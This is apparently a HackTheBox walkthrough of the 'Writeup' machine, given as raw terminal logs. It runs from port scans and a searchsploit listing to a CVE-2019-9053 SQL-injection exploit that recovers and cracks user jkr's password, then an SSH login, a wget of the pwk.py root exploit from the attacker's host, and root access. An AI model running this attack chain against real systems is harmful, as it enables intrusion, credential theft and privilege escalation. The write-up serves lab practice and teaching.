HackTheBox-Writeup

Crazy:~/HackThebox/Writeup$ sudo masscan -p1-65535,U:1-65535 --rate 2000 -e tun0 10.10.10.138[sudo] crazyinside 的密码：Starting masscan 1.3.2 (http://bit.ly/14GZzcT) at 2022-08-22 01:11:31 GMTInitiating SYN Stealth ScanScanning 1 hosts [131070 ports/host]Discovered open port 22/tcp on 10.10.10.138                                    Discovered open port 80/tcp on 10.10.10.138   Crazy:~/HackThebox/Writeup$ sudo nmap -sC -sV 10.10.10.138 -p22,80 -oN Writeup                             [sudo] crazyinside 的密码：Starting Nmap 7.92SVN ( https://ParrotOS.org ) at 2022-08-22 09:13 CSTNmap scan report for 10.10.10.138Host is up (0.20s latency).
PORT   STATE SERVICE VERSION22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)| ssh-hostkey: |   2048 dd5310700bd0470ae27e4ab6429823c7 (RSA)|   256 372e1468aeb9c2342b6ed992bcbfbd28 (ECDSA)|_  256 93eaa84042c1a83385b35600621ca0ab (ED25519)80/tcp open  http    Apache httpd 2.4.25 ((Debian))| http-robots.txt: 1 disallowed entry |_/writeup/|_http-title: Nothing here yet.Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://ParrotOS.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 12.77 secondszsh: segmentation fault  sudo nmap -sC -sV 10.10.10.138 -p22,80 -oN Writeup

Crazy:~/HackThebox/Writeup$ curl http://10.10.10.138/robots.txt#              __#      _(    |@@|#     (__/__ --/ __#        ___|----|  |   __#             }{ / )_ / _#            /__/ __O (__#           (--/--)    __/#           _)(  )(_#          `---''---`
# Disallow access to the blog until content is finished.User-agent: * Disallow: /writeup/                                                                                                                                        Crazy:~/HackThebox/Writeup$ 

Crazy:~/HackThebox/Writeup$ whatweb http://10.10.10.138/writeup/     http://10.10.10.138/writeup/ [200 OK] Apache[2.4.25], CMS-Made-Simple, Cookies[CMSSESSID9d372ef93962], Country[RESERVED][ZZ], HTML5, HTTPServer[Debian Linux][Apache/2.4.25 (Debian)], IP[10.10.10.138], MetaGenerator[CMS Made Simple - Copyright (C) 2004-2019. All rights reserved.], Title[Home - writeup]

Crazy:~/HackThebox/Writeup$ searchsploit CMS Made Simple------------------------------------------------------------------------------------------------------ --------------------------------- Exploit Title                                                                                        |  Path------------------------------------------------------------------------------------------------------ ---------------------------------CMS Made Simple (CMSMS) Showtime2 - File Upload Remote Code Execution (Metasploit)                    | php/remote/46627.rbCMS Made Simple 0.10 - 'index.php' Cross-Site Scripting                                               | php/webapps/26298.txtCMS Made Simple 0.10 - 'Lang.php' Remote File Inclusion                                               | php/webapps/26217.htmlCMS Made Simple 1.0.2 - 'SearchInput' Cross-Site Scripting                                            | php/webapps/29272.txtCMS Made Simple 1.0.5 - 'Stylesheet.php' SQL Injection                                                | php/webapps/29941.txtCMS Made Simple 1.11.10 - Multiple Cross-Site Scripting Vulnerabilities                               | php/webapps/32668.txtCMS Made Simple 1.11.9 - Multiple Vulnerabilities                                                     | php/webapps/43889.txtCMS Made Simple 1.2 - Remote Code Execution                                                           | php/webapps/4442.txtCMS Made Simple 1.2.2 Module TinyMCE - SQL Injection                                                  | php/webapps/4810.txtCMS Made Simple 1.2.4 Module FileManager - Arbitrary File Upload                                      | php/webapps/5600.phpCMS Made Simple 1.4.1 - Local File Inclusion                                                          | php/webapps/7285.txtCMS Made Simple 1.6.2 - Local File Disclosure                                                         | php/webapps/9407.txtCMS Made Simple 1.6.6 - Local File Inclusion / Cross-Site Scripting                                   | php/webapps/33643.txtCMS Made Simple 1.6.6 - Multiple Vulnerabilities                                                      | php/webapps/11424.txtCMS Made Simple 1.7 - Cross-Site Request Forgery                                                      | php/webapps/12009.htmlCMS Made Simple 1.8 - 'default_cms_lang' Local File Inclusion                                         | php/webapps/34299.pyCMS Made Simple 1.x - Cross-Site Scripting / Cross-Site Request Forgery                               | php/webapps/34068.htmlCMS Made Simple 2.1.6 - 'cntnt01detailtemplate' Server-Side Template Injection                        | php/webapps/48944.pyCMS Made Simple 2.1.6 - Multiple Vulnerabilities                                                      | php/webapps/41997.txtCMS Made Simple 2.1.6 - Remote Code Execution                                                         | php/webapps/44192.txtCMS Made Simple 2.2.14 - Arbitrary File Upload (Authenticated)                                        | php/webapps/48779.pyCMS Made Simple 2.2.14 - Authenticated Arbitrary File Upload                                          | php/webapps/48742.txtCMS Made Simple 2.2.14 - Persistent Cross-Site Scripting (Authenticated)                              | php/webapps/48851.txtCMS Made Simple 2.2.15 - 'title' Cross-Site Scripting (XSS)                                           | php/webapps/49793.txtCMS Made Simple 2.2.15 - RCE (Authenticated)                                                          | php/webapps/49345.txtCMS Made Simple 2.2.15 - Stored Cross-Site Scripting via SVG File Upload (Authenticated)              | php/webapps/49199.txtCMS Made Simple 2.2.5 - (Authenticated) Remote Code Execution                                         | php/webapps/44976.pyCMS Made Simple 2.2.7 - (Authenticated) Remote Code Execution                                         | php/webapps/45793.pyCMS Made Simple < 1.12.1 / < 2.1.3 - Web Server Cache Poisoning                                       | php/webapps/39760.txtCMS Made Simple < 2.2.10 - SQL Injection                                                              | php/webapps/46635.pyCMS Made Simple Module Antz Toolkit 1.02 - Arbitrary File Upload                                      | php/webapps/34300.pyCMS Made Simple Module Download Manager 1.4.1 - Arbitrary File Upload                                 | php/webapps/34298.pyCMS Made Simple Showtime2 Module 3.6.2 - (Authenticated) Arbitrary File Upload                        | php/webapps/46546.py------------------------------------------------------------------------------------------------------ ---------------------------------Shellcodes: No Results------------------------------------------------------------------------------------------------------ --------------------------------- Paper Title                                                                                          |  Path------------------------------------------------------------------------------------------------------ ---------------------------------CMS Made Simple v2.2.13 - Paper                                                                       | docs/english/49947-cms-made-simp------------------------------------------------------------------------------------------------------ ---------------------------------                                                                                               

https://github.com/4nner/CVE-2019-9053/blob/master/exploit.py

./exploit.py -u http://10.10.10.138/writeup --crack --wordlist /usr/share/wordlists/rockyou.txt

[+] Salt for password found: 5a599ef579066807[+] Username found: jkr[+] Email found: jkr@writeup.htb[+] Password found: 62def4866937f08cc13bab43bb14e6f7[+] Password cracked: raykayjay9

Crazy:~/HackThebox/Writeup$ ssh jkr@writeup.htb                    jkr@writeup.htb's password: Linux writeup 4.9.0-8-amd64 x86_64 GNU/Linux
The programs included with the Devuan GNU/Linux system are free software;the exact distribution terms for each program are described in theindividual files in /usr/share/doc/*/copyright.
Devuan GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extentpermitted by applicable law.Last login: Sun Aug 21 21:49:32 2022 from 10.10.16.5jkr@writeup:~$ sudo -l-bash: sudo: command not foundjkr@writeup:~$ cat user.txt fe...................................jkr@writeup:~$ jkr@writeup:~$ wget http://10.10.16.3/pwk.py--2022-08-21 21:51:50--  http://10.10.16.3/pwk.pyConnecting to 10.10.16.3:80... connected.HTTP request sent, awaiting response... 200 OKLength: 3448 (3.4K) [text/x-python]Saving to: ‘pwk.py’
pwk.py                            100%[=============================================================>]   3.37K  --.-KB/s    in 0.01s   
2022-08-21 21:51:51 (236 KB/s) - ‘pwk.py’ saved [3448/3448]
jkr@writeup:~$ lspwk.py  sharedvuln  user.txtjkr@writeup:~$ python pwk.py   File "pwk.py", line 43    cargv = (c_char_p * (len(argv) + 1))(*argv, None)SyntaxError: only named arguments may follow *expressionjkr@writeup:~$ python3 pwk.py # iduid=0(root) gid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),50(staff),103(netdev),1000(jkr)# cat /root/root.txtbf84..............................#